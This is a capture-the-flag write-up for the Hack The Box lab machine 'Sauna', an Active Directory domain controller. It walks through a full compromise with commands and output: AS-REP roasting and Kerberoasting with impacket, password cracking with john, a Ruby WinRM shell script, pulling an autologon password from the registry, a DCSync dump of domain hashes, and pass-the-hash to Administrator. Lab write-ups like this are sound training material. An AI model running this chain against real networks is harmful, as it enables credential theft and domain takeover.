Hack The Box - Sauna

Sauna is a Windows machine considered easy and Active Directory oriented. The company’s website indicates a potential list of users, allowing to perform a brute force through an ASRepRoasting attack. Getting a shell through WinRM allow to list the domain properties and find a password in the WinLogon registry keys. This user has the necessary rights (DCSync) to dump the NTDS database, which allows to connect with the NTLM hash of the administrator.

Disclaimer : This post is about a quick solution, omitting different searching phases. Only results and a quick approach are presented

Discovery / Enumeration

Un quick port scan give running services on the target

$ sudo nmap -sS -p 0-10000 -T4 -sV -sC default -O -v -oN scan_nmap 10.10.10.175

Host is up (0.035s latency).
Not shown: 9987 filtered ports
PORT     STATE SERVICE       VERSION
53/tcp   open  domain?
| fingerprint-strings: 
|   DNSVersionBindReqTCP: 
|     version
|_    bind
80/tcp   open  http          Microsoft IIS httpd 10.0
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Egotistical Bank :: Home
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2020-02-17 00:23:34Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)

Domain is gathered and services seems to indicate that the machine is an Active Directory Domain Controller.

Important Note : To avoid problems when using DNS resolution, don’t forget to put informations on the resolv.conf and hosts files.

$ cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 kalinux

10.10.10.175 egotistical-bank.local
$ cat /etc/resolv.conf 
search egotistical-bank.local
nameserver 10.10.10.175


Potentiels utilisateurs et ASRepRoasting

Having no other entry point, we quickly focus on the company’s website. Some research on the possible exploitation of the IIS server gives nothing. However, an interesting element attracts our attention. Indeed, the company’s “about” page mentions several collaborators as well as the following note.

Meet the team. So many bank account managers but only one security manager. Sounds about right!

From theref, if we mnde From there, thinking of our target machine as a real company, it is possible to imagine possible naming conventions for Active Directory user accounts:

prenom.nom
p.nom
pnom
nom

Based on this, we are able to build a small wordlist of potential accounts. I then spent a few minutes testing trivial passwords to try to find access, without success.

This is where another vulnerability, already exploited on other boxes, comes ;). Named “ASRepRoasting”, this one is based on the “Do not require Kerberos preauthentication” property of an account and allows to retrieve a KRB5ASREP ticket, without prior authentication.

The impacket suite provides a script to automate this request.

$ python GetNPUsers.py egotistical-bank.local/ -usersfile ../../../../HackTheBox/Sauna/users.txt
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation

[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:4f51424f1adb173550e06e8404dec4fe$98cac414702d5825e3ad4f4a5abfebe1fce96dfb8dd66d38e1184c67cda213c8b3c59d5a7f841d11b9589cd9c016355943d5fc729070494d50b9da512f509bc03329e682235af3e4599097d88ebab18bf395eb7d8aeb69b2cedb61a87d13aedcf6973a28a7bc09220386c39fa877dd93b3abe3da2ff9954fcbb7b1e35b4ac9565c5862d733b05cc8b0bf51e2e740bea0b709b5ed0bbd6022e7601ecbbf97cfbb7a521f62e7078962a5d84a4f81fc66a41981a6166194785090c07f9029cb1fabfd3575bacc0c84558f6d7950c91cc6c2a0e09ba19585b4d83ce6b953e0cd08de877d13abca6f39cac6d4d47024462dfb7d8a8d3a89637ee1ca6f1982cf395f39
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)

Bingo ! The fsmith account seems valid. However, the ticket is not right now usable. Indeed, it is necessary to crack it in order to retrieve the password in clear text.

Passacracking and user shell

Now starting a small passcracking session, using john and a simble famous wordlist.

$ sudo john KRB5ASREP_hash.txt --wordlist=/usr/share/wordlists/rockyou.txt --format=krb5asrep

Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 256/256 AVX2 8x])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status

Thestrokes23     ($krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL)
1g 0:00:00:22 DONE (2020-02-20 13:27) 0.04438g/s 467776p/s 467776c/s 467776C/s Thing..Thehunter22
Use the "--show" option to display all of the cracked passwords reliably
Session completed

The account password is cracked quite quickly.

$ crackmapexec smb 10.10.10.175 -u fsmith -p 'Thestrokes23'                              
CME          10.10.10.175:445 SAUNA           [*] Windows 10.0 Build 17763 (name:SAUNA) (domain:EGOTISTICALBANK)
CME          10.10.10.175:445 SAUNA           [+] EGOTISTICALBANK\fsmith:Thestrokes23 
[*] KTHXBYE!

However, this account is not an administrator and possibilities for remote command execution are limited. This is where WinRM (Windows Remote Management) comes in. It is a Microsoft HTTP service/protocol, based on WS-Management (SOAP) that allows remote administration of Windows machines. Back to our nmap scan, the port 5985, used by default by WinRM, is open.

Several ways to exploit it. I chose to use the following Ruby script.

require 'winrm'

conn = WinRM::Connection.new( 
  endpoint: 'http://10.10.10.175:5985/wsman',
  user: 'EGOTISTICAL-BANK\fsmith',
  password: 'Thestrokes23',
)

command=""

conn.shell(:powershell) do |shell|
    until command == "exit\n" do
        print "PS > "
        command = gets        
        output = shell.run(command) do |stdout, stderr|
            STDOUT.print stdout
            STDERR.print stderr
        end
    end    
    puts "Exiting with code #{output.exitcode}"
end

Which give machine access and the first flag !

$ ruby winrm_shell.rb

PS > whoami
egotisticalbank\fsmith

PS > pwd
Path                     
----                     
C:\Users\FSmith\Documents

PS > ls ../Desktop 
    Directory: C:\Users\FSmith\Desktop
Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----              1/23/2020 10:03 AM    34     user.txt


Enumeration (½) and Kerberoasting

Having access to the machine and the domain, the enumeration phase can begin. Thinking back to the note seen before, we can assume that one user account must have privilegied rights (the “security manager” account).

So first step, enumerate the domain accounts.

$ rpcclient -U 'EGOTISTICAL-BANK/fsmith' 10.10.10.175                                                    

rpcclient $> enumdomusers
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[HSmith] rid:[0x44f]
user:[FSmith] rid:[0x451]
user:[svc_loanmgr] rid:[0x454]

There are 3 accounts, excluding built-in accounts required for the domain. Since we already control fsmith, there are only 2 potential targets left. Both of them are not part of the initial list of users, so it could be the famous security account.

After some research, it turns out that the hsmith account is used as a service account. This can be seen with impacket.

$ python GetUserSPNs.py -dc-ip 10.10.10.175 EGOTISTICAL-BANK.LOCAL/fsmith
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation

Password:
ServicePrincipalName                      Name    MemberOf  PasswordLastSet             LastLogon 
----------------------------------------  ------  --------  --------------------------  ---------
SAUNA/HSmith.EGOTISTICALBANK.LOCAL:60111  HSmith            2020-01-23 06:54:34.140321  <never>   

We can then exploit it by using a “Kerberoasting” attack. It consists of requesting a TGS ticket for a specific service account. It is then necessary to crack the ticket in order to use the account.

$ python GetUserSPNs.py -dc-ip 10.10.10.175 EGOTISTICAL-BANK.LOCAL/fsmith -request
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation

Password:
ServicePrincipalName                      Name    MemberOf  PasswordLastSet             LastLogon 
----------------------------------------  ------  --------  --------------------------  ---------
SAUNA/HSmith.EGOTISTICALBANK.LOCAL:60111  HSmith            2020-01-23 06:54:34.140321  <never>   



$krb5tgs$23$*HSmith$EGOTISTICAL-BANK.LOCAL$SAUNA/HSmith.EGOTISTICALBANK.LOCAL~60111*$3f83e16fcf6121de6d5108bf7f5ca54e$2631853280dbc9343b504b32d3cb9c8c878a30ca9fe445b9f25e9f60b618137342062bf845ec776c30c851525d6e6cc44ff4097614405f8a8eaabb17f2297c6376ffb2b5b4e4d7caa98dea57d1e48e6c47da42936176773853e32a189239ba756ea1d1ac0db03d96ac6165610e747ff039f415c25dc7e5d9957c3783d417a4870a09b430e65f7b7f8d4994713e0cf3ceef3a76de873c265d17f100bc41e85a4fd718ac02aa1bed47a200ff5f1d53ada353105fe6dc551c05afcfa8c0478457385cd1241142d69a8134849ed2cd8d66b68e6438902ecaf3c58c227614e793bad77c149eb9086ce1c92a9b860c4f38adac25bc387b8e8fd49fbc2af925af1eb2183c126035a21312e09cdf464d7767d3c5c61fd070c3fce917758cdc75f2979c667d2d4c01f83ed52963e8fbe5c3cf9d7491aa9e77f3ec85edde2a8eeeab8fde6b6f5b2a66ef149384a1bb77e440d33e29ade5bf1c869f9819ecd55f6d5d97232d500a04cf242e0fecce881539d5e28339c68ac8f8631d56fdabc7c3b84ab392ff1e193ec4dcf8b8fa03e2b2e1d296d0c376b404e72a846ce97bd4a0054ee6e1973bdbe1f7596b883c847a3cf19691eda57aef877d078da2f3cfecb09afdded3d54e4113e43b353f98cc84649bc16c14e7c284fd691c8eb70ac0e4cb95be0661a142964b3945ef592934e9bc4dbcf1206347929aa6d58eec9b84f654b8d644e8ff1f85949047ab66277f89fb9fe1861d57560377299c51c163b721f22d1ee05264e7134eb6524505dec23d3afffdd98dd2c11afbf1b3ae0c119825e795ac742fdad06b593a8943e6d190c776ea8fa168eb647ee41a0bf87b0ce917e6b35bdfed79a298c2fed9137150819492e3784fb14e6e460869ab8fb95452c204df290354925d81ce7ace8c09e52593df3784c2d30821883a5da63098c5428893f02edfc3c09ce4d5fd1f9a5930e696720066082244dee437975243dcb0607ff653f148b0bf0513592142d1ff5fa9c3327977677a85c44821c11e81b0a0791d46f7d059984dcce8180187b9be01230571e6ae71693e463ceee020a7cf4eef64e4b6b837d9d8612b57f4915a0a4473e39a244d1a3e1bd0ac1b32190b7b0d14a26b8e54151fbb69c12581d9d992962be828f007c28fff4b8e5676a5384b7b56dfd195ad635ebfea43fb75f1954708d40bbe542f2684d8ceb7325cc248304b00e3140589d7e0cc95e6d3402f4ae15fde6edea85dfcd38229decbb35e4724907b875be249ed8ff5cd4e645e5d8c0db3de2192c593bc019c6f470a7d4d148c2cfbf7f2c50d0f2bf6bfa0805b93946106b361a1b614b0c5987eaec320cdf6e1cb58a1f793fd187246f395fb175d6a23bb1cc96cd1e5f39a7bee010f5cfd3a1aa9826526e0d73a22c69706a390e4

Using the same technique as for the previous ticket (but for another format) we can try to crack it. We quickly manage to find the password for hsmith which is… The same password as for fsmith.

$ crackmapexec smb 10.10.10.175 -u hsmith -p 'Thestrokes23'                             
CME          10.10.10.175:445 SAUNA           [*] Windows 10.0 Build 17763 (name:SAUNA) (domain:EGOTISTICALBANK)
CME          10.10.10.175:445 SAUNA           [+] EGOTISTICALBANK\hsmith:Thestrokes23 
[*] KTHXBYE!

However, we also quickly realize that this user does not have particularly interesting privileges for us…

Enumeration (2/2) and getting the secound account

Since the second account recovered does not help to compromise the machine, we can run a second enumeration phase, focused on the machine and files.

After some classical searches, interesting information can be recovered in the WinLogon registry key.

PS > reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon
    AutoRestartShell    REG_DWORD    0x1
    Background    REG_SZ    0 0 0
    CachedLogonsCount    REG_SZ    10
    DebugServerCommand    REG_SZ    no
    DefaultDomainName    REG_SZ    EGOTISTICALBANK
    DefaultUserName    REG_SZ    EGOTISTICALBANK\svc_loanmanager
    DisableBackButton    REG_DWORD    0x1
    EnableSIHostIntegration    REG_DWORD    0x1
    ForceUnlockLogon    REG_DWORD    0x0
    LegalNoticeCaption    REG_SZ    
    LegalNoticeText    REG_SZ    
    PasswordExpiryWarning    REG_DWORD    0x5
    PowerdownAfterShutdown    REG_SZ    0
    PreCreateKnownFolders    REG_SZ    {A520A1A4-1780-4FF6-BD18-167343C5AF16}
    ReportBootOk    REG_SZ    1
    Shell    REG_SZ    explorer.exe
    ShellCritical    REG_DWORD    0x0
    ShellInfrastructure    REG_SZ    sihost.exe
    SiHostCritical    REG_DWORD    0x0
    SiHostReadyTimeOut    REG_DWORD    0x0
    SiHostRestartCountLimit    REG_DWORD    0x0
    SiHostRestartTimeGap    REG_DWORD    0x0
    Userinit    REG_SZ    C:\Windows\system32\userinit.exe,
    VMApplet    REG_SZ    SystemPropertiesPerformance.exe /pagefile
    WinStationsDisabled    REG_SZ    0
    scremoveoption    REG_SZ    0
    DisableCAD    REG_DWORD    0x1
    LastLogOffEndTimePerfCounter    REG_QWORD    0x8e3982368
    ShutdownFlags    REG_DWORD    0x80000027
    DisableLockWorkstation    REG_DWORD    0x0
    DefaultPassword    REG_SZ    Moneymakestheworldgoround!

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon\AlternateShells
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon\GPExtensions
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon\UserDefaults
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon\AutoLogonChecked
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon\VolatileUserMgrKey

Using the same technique as for other accounts, we can try the password using the following tool.

$ crackmapexec smb 10.10.10.175 -u svc_loanmgr -p 'Moneymakestheworldgoround!'
CME          10.10.10.175:445 SAUNA           [*] Windows 10.0 Build 17763 (name:SAUNA) (domain:EGOTISTICALBANK)
CME          10.10.10.175:445 SAUNA           [+] EGOTISTICALBANK\svc_loanmgr:Moneymakestheworldgoround! 
[*] KTHXBYE!

Alright ! We now have all user accounts (excepted built-in ones) !

NTDS dumping and compromission

I’m skipping the research phase in order to go straight to the solution. The recon phase can be made through tools like BloodHound. This way, we can see that our svc_loanmgr user has the DCSynv privileges ! It turns out that the svc_loanmgr account has sufficient privileges to access the NTDS base of the Active Directory.

So, for example, we can remotely extract the NTDS.dit file using impacket.

$ secretsdump.py -dc-ip 10.10.10.175 EGOTISTICAL-BANK/svc_loanmgr@10.10.10.175
Impacket v0.9.21.dev1+20200220.181330.03cbe6e8 - Copyright 2020 SecureAuth Corporation

Password:
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:d9485863c1e9e05851aa40cbb4ab9dff:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:4a8899428cad97676ff802229e466e2c:::
EGOTISTICAL-BANK.LOCAL\HSmith:1103:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\FSmith:1105:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:1108:aad3b435b51404eeaad3b435b51404ee:9cb31797c39a9b170b04058ba2bba48c:::
SAUNA$:1000:aad3b435b51404eeaad3b435b51404ee:57e522d5738515b8a45d0d4d7b6546e2:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:987e26bb845e57df4c7301753f6cb53fcf993e1af692d08fd07de74f041bf031
Administrator:aes128-cts-hmac-sha1-96:145e4d0e4a6600b7ec0ece74997651d0
Administrator:des-cbc-md5:19d5f15d689b1ce5
krbtgt:aes256-cts-hmac-sha1-96:83c18194bf8bd3949d4d0d94584b868b9d5f2a54d3d6f3012fe0921585519f24
krbtgt:aes128-cts-hmac-sha1-96:c824894df4c4c621394c079b42032fa9
krbtgt:des-cbc-md5:c170d5dc3edfc1d9
EGOTISTICAL-BANK.LOCAL\HSmith:aes256-cts-hmac-sha1-96:5875ff00ac5e82869de5143417dc51e2a7acefae665f50ed840a112f15963324
EGOTISTICAL-BANK.LOCAL\HSmith:aes128-cts-hmac-sha1-96:909929b037d273e6a8828c362faa59e9
EGOTISTICAL-BANK.LOCAL\HSmith:des-cbc-md5:1c73b99168d3f8c7
EGOTISTICAL-BANK.LOCAL\FSmith:aes256-cts-hmac-sha1-96:8bb69cf20ac8e4dddb4b8065d6d622ec805848922026586878422af67ebd61e2
EGOTISTICAL-BANK.LOCAL\FSmith:aes128-cts-hmac-sha1-96:6c6b07440ed43f8d15e671846d5b843b
EGOTISTICAL-BANK.LOCAL\FSmith:des-cbc-md5:b50e02ab0d85f76b
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:aes256-cts-hmac-sha1-96:6f7fd4e71acd990a534bf98df1cb8be43cb476b00a8b4495e2538cff2efaacba
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:aes128-cts-hmac-sha1-96:8ea32a31a1e22cb272870d79ca6d972c
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:des-cbc-md5:2a896d16c28cf4a2
SAUNA$:aes256-cts-hmac-sha1-96:ace005f6cec7d0c39b54a2bc7c55637bfede1ef5c02bdf7056b71770a3563ea2
SAUNA$:aes128-cts-hmac-sha1-96:c46b61ef2fff501974152d8e0871bd4e
SAUNA$:des-cbc-md5:104c515b86739e08
[*] Cleaning up... 

At this point, we have all needed informations to compromise the machine. Indeed, since we have the NTLM hash of the Domain Administrator account, we can use it as Pass the Hash to access the machine.

$ wmiexec.py egotistical-bank/Administrator@10.10.10.175 -hashes 'aad3b435b51404eeaad3b435b51404ee:d9485863c1e9e05851aa40cbb4ab9dff' 
Impacket v0.9.21.dev1+20200220.181330.03cbe6e8 - Copyright 2020 SecureAuth Corporation

[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>whoami
egotisticalbank\administrator

C:\>hostname
SAUNA

C:\>dir C:\Users\Administrator\Desktop
 Volume in drive C has no label.
 Volume Serial Number is 489C-D8FC

 Directory of C:\Users\Administrator\Desktop

01/23/2020  03:11 PM    <DIR>          .
01/23/2020  03:11 PM    <DIR>          ..
01/23/2020  10:22 AM                32 root.txt
               1 File(s)             32 bytes
               2 Dir(s)   7,982,071,808 bytes free

w00ted !

Hack The Box - Monteverde Hack The Box - Remote